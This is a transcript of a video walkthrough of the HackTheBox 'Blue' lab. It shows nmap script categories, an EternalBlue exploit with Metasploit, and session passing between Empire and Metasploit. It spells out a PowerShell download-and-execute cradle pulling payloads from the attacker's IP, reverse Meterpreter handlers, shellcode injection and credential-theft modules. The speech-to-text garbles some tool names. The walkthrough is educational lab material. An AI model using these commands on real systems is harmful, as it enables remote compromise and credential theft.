What's going on YouTube? This is IppSec and we'll be doing Blue from HackTheBox. This box may not seem interesting because people popped in around 3 minutes, but we're going to do some different things in this video. First off, we're going to look into NMAP because I've said something wrong in every video. -SC is not safe scripts, it is default scripts. There's a big difference, we'll look into that. Then after that, we're going to pop the box with Metasploit with the Eternal Blue exploit. Nothing special there. Once we do that, we're going to pass that session from Metasploit into Empire and do a few things with Empire, and then pass it from Empire back to Metasploit. So you get familiar with both those tools. So let's jump in. Let's start off like every other box with an nmap-sc for default scripts, not safe scripts. SV, enumerate versions, output all formats, and we'll call the file nmap-scripts and the IP address of blue, which is 10.10.10.40. Looking at the results, we do see no vulnerabilities. It just does pure enumeration. And this is what made me look into exactly what -sc meant, because I knew the Eternal Blue exploit script was classified as safe. So it confused me why its vulnerability information was not in the output of this nmap. So if we want to, we can search for the Eternal Blue exploit. And the first thing I did was locate for Lou, because it could be capital B or lowercase b. So I just got rid of the B altogether. And then I grepped that for anything that ends with .nse. Didn't see anything, so I went with the Microsoft Security Bulletin, which is MS17-010. And now we get the vulnerability script. Looking into this, we go to categories, and we see it is indeed classified as vuln and safe, so it should have ran if SC meant safe scripts, but again, does not. It means default. So if we want to run just safe scripts against port 445, we can do nmap-p 445 --script safe. And this can be a directory, file name, category. It's a relatively smart argument. So if we just wanted to scan for Eternal Blue, we could just copy this and paste it in. We could also copy this with NSE. We could run everything and just paste this, but that is not intended because that runs all scripts, including non-safe ones. So --script safe. To make it go a bit quicker, I'm going to disable the ping and DNS resolution, and we'll just do 10.10.10.40. Safe scripts will still take a while because it runs a lot of scripts. So while it's running, let's look at all the other possibilities for nmap scripts. So I'm going to grep-r for the word category, and we're going to look in user share nmap scripts stir.nse. And we can see all the categories things can be in. We got the file name equals, file name colon, and then categories and what they are. If we only wanted to see the categories, we can do a grep-op because this is so overpowered, and search for everything in between quotes. And now we just get a list of everything that was in between quotes. And we can then sort -u, and we get a list of all the potential categories for nmap. You got auth, broadcast, brute, default, discovery, denial of service, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln. So if you want to see what scripts are ran with -sc, you could just do grep-r categories on user share nmap script stir.nse, then grep that for default. And then we could also pipe that to awk field separator as semicolon, regular colon, and print 1. And that's all the scripts that nmap classifies as default. But enough of that. Let's look at the output for safe. And we see there is actually a lot of output. We have a pre-scanned information thing that says stuff about, I guess, layer 2, layer 3, random stuff that may be helpful if you just wanted to, I don't know, but information. Then we got a bunch of, what is this? Maybe MS RPC enumeration, and a lot of information. Then we got the regular enumeration that we used to see in -SC, and then we got Eternal Blue with that SMB Vaughan MS17010. If we want it to be a bit more just targeted at vulnerabilities, we could also put this in quotes and do Vaughan and safe, and that's only going to run the vulnerability scripts that are classified as safe. We could get rid of that altogether and just do Vaughan. It'll take a little bit because it's going to run a few more scripts, but that's a little bit into NMAP and the power it can have and how you can detect some of these vulnerabilities. And yeah, but now that we know it is vulnerable to Eternal Blue, it is time to exploit it with Metasploit. So let's load up Metasploit with MSF console. And this could take a few seconds to load. And then once this loads, we can do search for MS17010, and we find the exploit here. So if we just use this exploit, do show options, and we don't see exactly what the payload is. And I always hate when it doesn't show you the payload. So let's just set the payload to be Windows x64 Meterpreter reverse TCP. And then set lhost to be ton0. And then we can set our host to be 10.10.10.40. Our host is the target. And do exploit-j. And we're setting the Eternal Blue exploit, saying stager, Meterpreter session 1 has been opened. So now we have an error message, but everything seems to be good. Not exactly sure what that is, but everything seems fine. That was odd. So let's just keep continuing like that didn't exist and get Empire. So I'm going to actually delete my Empire directory and let's just pull a new one. So if we do GitHub Empire, we should find it. And I always like doing the development version of Empire instead of the master. So git clone Empire and then -b for branch, and we're going to specify dev. If you want to, you can switch the branch here to dev and then look at the commits to see exactly what has changed since master. But Empire changes so much, and there's so many good quality of life fixes, I just like using dev. So once we get Empire, we have to go into setup and then run the install.sh script. And this doesn't take too long. Installs a few things, and once this finishes, we should be able to launch Empire. So enter server negotiation password. Just hit enter for random generation. Random generation's great, and it runs everything. So go back to our Empire directory, execute Empire, and we're in. We have 283 modules installed. We can run help to get an idea of what commands we want, but the first command I always run is going to be listeners to get into the listeners, I guess, tab or whatever this means. Then this opens up new commands. So we can do use listener and then specify HTTP, or we can just hit tab a few times to see what possible listeners there are. But we're going to specify HTTP and then run info. Info is kind of like the show options of Metasploit and see what things we have. So the host we have to change. I highlighted the wrong thing. And the port we're going to have to change. So we're going to set the host to be HTTP 10.10.14.16, I think is my IP. 14.16, yep. and then specify the port. And this is something that has just recently changed, like within the past week. Empire 2.3, the bind port and host, you couldn't have different ones. And 2.4 it changed, and you have to set both of them. So if I just set this to 443 and do info, we can see the port doesn't change. If we set the port to be like 888, and previous versions of Empire, it would also change the host, but no longer does that, so we also have to set the port to be 443. And this is actually going to make it SSL or HTTPS, but I normally just use 443 because it's allowed outside of firewalls. So once we have all the configuration, we can do execute to start the listener, and then back out of this once, and we can generate a PowerShell payload with launcher, PowerShell, and then the listener name, which is HTTP. And we get this PowerShell query. Then we go back to our box, and I'm going to make a directory called HTTP. And we're going to do empire.ps1 and paste the output of that launcher. If you wanted to, there are stagers that are like launchers, so we can do uStager, and then for Windows we have Bunny, Ducky, DLL, HTA, that's a web one, BAT files, VBS files, macros, macro list, Word document maybe. I don't know exactly what that one is, but there's a bunch of different stages you can do. But if all you want to do is run a command, you can just do launcher, PowerShell, and then your listener. So now that we got empire.ps1, we're going to do python-m simple HTTP server on port 80. So we can go back to a Windows box, session-i1, shell, and we can do PowerShell IEX, new object, net.webclient, .download string, then HTTP 10.10.14.16 / empire.ps1. We see we got that, and we have our agent in Empire. So we can back out of this, go back to the main menu, we can type agents, and we can see the agent in the last scene time. And the delay is 5. Empire is different in that it's not a... I'm going to get this messed up. I can't remember the difference between synchronous and asynchronous. Essentially, Empire polls us every 5 seconds. If we want to change that, we can do sleep on all agents to 1. And now the delay is going to be set to 1, which means it's going to check our web server for commands every single second. So if we want to just run a command against one single agent, we can do interact with the agent ID. I just hit tab so it autofilled. And if you didn't know it, the name is the agent ID. So interact with that agent, and we can do use module, and then everything's tab auto completion. So we could do, let's see, use module, privesc, and then PowerUp, AllChecks. And then just run execute, and it will say the job starts once the agent pulls back to you. There we go, the job started, and it'll show the results in this window once it finishes. We could also go back and do help. There is a Mimikatz hotkey. There's also search module Mimikatz, and that's under mainly credentials. If we type jobs, we can see what jobs are running or queued on the Empire agent, and that PowerUp should be finishing any minute now. Additionally, we can load modules into memory. If it's not coded to Empire yet, let's say opt, what is it? Windows privesc Sherlock. we want to run this script, and it looks like we got some bad Unicode there. If we delete Sherlock, and we'll re-pull it, see if it fixes itself. GitHub Sherlock git clone. He's only got master, no dev. So Sherlock, that's still there. XSD, PS, Sherlock, X. Delete 6 characters. Because I think it was only 6. Then .hex to PS1 and the -r. There we go. There was Unicode before that, which probably would cause it errors. But anyways, we can go back to Empire. Our Invoke-AllChecks had completed. So you can see the results. Because we're already system, it's going to show a bunch of stuff. But that's how you run modules in Empire. It does have a few commands. So we got, let's see, InjectShellcode I don't really like. We can get into that in a little bit. Loss limit is good. That's how many times the agent's going to poll you, and if you don't exist, then kill itself. So normally I'd set this to like 1440, which is on 5 minutes, I think 48 hours or 24 hours or something. So my computer can go offline for a whole day, and I normally don't lose the session. So that's what loss limit is. Let's see. Script CMD. Execute a function that's currently imported PowerShell script and script import. This is what we're going to be using real quick. So we can do script import, specify. Oh, I just copied. Copy this. Sherlock.ps1. And it already pulled that one script into memory. So now we can do script CMD, find all vulns, which is a function that's inside that Sherlock.ps1. And now it's going to run that command against the server. So we can see it's also vulnerable to MS16-134 in case we were not admin. But that's how you do custom things in Sherlock. Let's see. The last thing I guess we want to do is pass something back to Metasploit. And this is what gets a little tricky. So let's go back a few times, and we can do something that's probably going to not work, and then do it the way I normally do it. So we can go back to our Listeners tab, and do use listener, interpreter. I think that's it. Info, set host to be HTTP 170, not 172, 10, 10, 14, 16. We'll say port 8001. Set port 8001. And what we should be able to do is go back, interact, background this, use exploit multi-handler, set payload to be Windows x64 interpreter, just waiting for that top autocomplete to finish, and then reverse HTTP. Do info, show options is Metasploit's way. I hate how they change. Set lhost to ton 0, set lport to 8001, exploit-j. So what we should be able to do is a ps command to get processes, and then pick a process we want. So PowerShell running a system is generally a good thing to inject to. So we should be able to do, what is it? InjectShellcode, and I didn't type execute on my listener. So listeners, use listener, interpreter, info, already set, execute, so it started. Then interact, shellcode, no, inject shellcode, interpreter, and then the PID of that PowerShell session, do info, and if we execute this, oh no, we have to set the payload to be reverse HTTP, execute, job started, session 2 opened, session-i 2, and we do help, and it doesn't actually load the standard API, because the core commands, we should see a lot more information. And I think the issue is the shellcode inject only works on a 32-bit process, and it's a pain to get a 32-bit process running, because if we wanted to, the way we would go about that is use module management run as info set CMD to be probably C:\/ Windows syswow 64, is it? Syswow 6432. Yeah, I think syswow 64. It won't matter because this won't work. But I think that would be the right way to spawn a 32-bit command prompt. If we do info, we see CMD is true, agent is true, everything else is false. We don't have it. So we have everything that's true. And we do run or execute, it wants either cred ID or username. So run as, you literally need to do run as. I don't think there is just a regular run. So if we go back, the way I normally do this is through Unicorn. So go back here. We can do opt Unicorn. This is TrustedSec Unicorn. You can Google it, get it off GitHub. I've shown you how to clone a few times. And then unicorn -- help. We have an example here. So Python unicorn.py Windows interpreter reverse TCP. No, we'll do reverse HTTP. And then 10.10 14.16. We'll do 8002. We're back around this session. We will create a 32-bit handler. Set L port to be 8002. Exploit -j. And for completion's sake, we'll do the InjectShellcode, but with a 32-bit one this time. So we have to go back again. Listeners, use listener, interpreter, info, set port to be 8002, set host to be HTTP 10.10 14.16 8002. Execute, we got interpreter 1, so we can go back twice, interact with the agent, and then inject shellcode, interpreter 1, and I don't know the PID, so PS, inject shellcode, interpreter 1, 2992. Should get session soon. Maybe not. I think I do main to go back to the main. Listeners, 10.10 14.16 8002. That looks right. Huh. back. Oh, set L port 8002. Execute. Let's see, does that one work this time? There we go. Session 3 open. And we still don't have the standard API. We can try loading it, and then Meterpreter is going to crash. So, Unicorn created a file called PowerShell attack.txt. So we can just cp opt unicorn PowerShell attack.txt to a directory, start the simple HTTP server up again, and then in Empire, go back to where we're interacting with the client. We can just do shell, and this does PowerShell commands. So, is it get child for something? I'm not exactly sure, but drawing a blank on PowerShell commands to do like a dir. I don't know if that's going to work. Oh, it does. So, we can choose shell, IEX, new object, net.web client, download string, HTTP 10.10.14.16 slash PowerShell attack.txt. We see the web server says we sent it, and we got Meterpreter session 4 open. This is still on 3, so background 3. Go into 4, and we have a full Meterpreter session. So that's generally how I passed between Empire to Metasploit. It looks like it took a long time because I was showing the InjectShellcode issue and why I just like doing it through Unicorn. But hope you guys enjoyed the video, and take care.